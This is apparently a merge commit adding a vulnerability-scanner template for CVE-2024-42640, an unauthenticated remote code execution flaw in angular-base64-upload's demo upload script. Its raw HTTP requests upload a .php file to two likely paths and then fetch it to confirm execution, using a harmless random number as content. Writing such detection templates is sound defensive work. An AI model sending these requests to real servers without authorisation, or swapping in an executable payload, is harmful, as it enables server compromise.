Merge pull request #11000 from Kazgangap/CVE-2024-42640

CVE-2024-42640
2024-11-20 10:12:26 +05:30 · 2024-11-20 10:12:26 +05:30 · d38ae927f3
parent ceac38b459 eb50795b58
commit d38ae927f3
1 changed files with 69 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-42640.yaml
+++ b/http/cves/2024/CVE-2024-42640.yaml
@ -0,0 +1,69 @@
+id: CVE-2024-42640
+
+info:
+  name: Angular-Base64-Upload - Remote Code Execution
+  author: s4e-io
+  severity: critical
+  description: |
+    angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
+  reference:
+    - https://github.com/rvizx/CVE-2024-42640
+    - https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
+    - https://github.com/adonespitogo/angular-base64-upload
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-42640
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
+    cvss-score: 10
+    cve-id: CVE-2024-42640
+    cwe-id: CWE-94
+    epss-score: 0.00043
+    epss-percentile: 0.09695
+  metadata:
+    max-request: 4
+  tags: cve,cve2024,angular,rce
+
+variables:
+  filename: "{{to_lower(rand_text_alpha(12))}}"
+  num: "{{rand_int(1000000,9999999)}}"
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        POST /node_modules/angular-base64-upload/demo/server.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}
+
+      - |
+        POST /bower_components/angular-base64-upload/demo/server.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_1,"uploads/{{filename}}.php") || contains(body_2,"uploads/{{filename}}.php") '
+          - 'status_code_1 == 200 || status_code_2 == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /node_modules/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /bower_components/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_3, "{{num}}") || contains(body_4, "{{num}}")'
+          - 'status_code_3 == 200 || status_code_4 == 200'
+        condition: and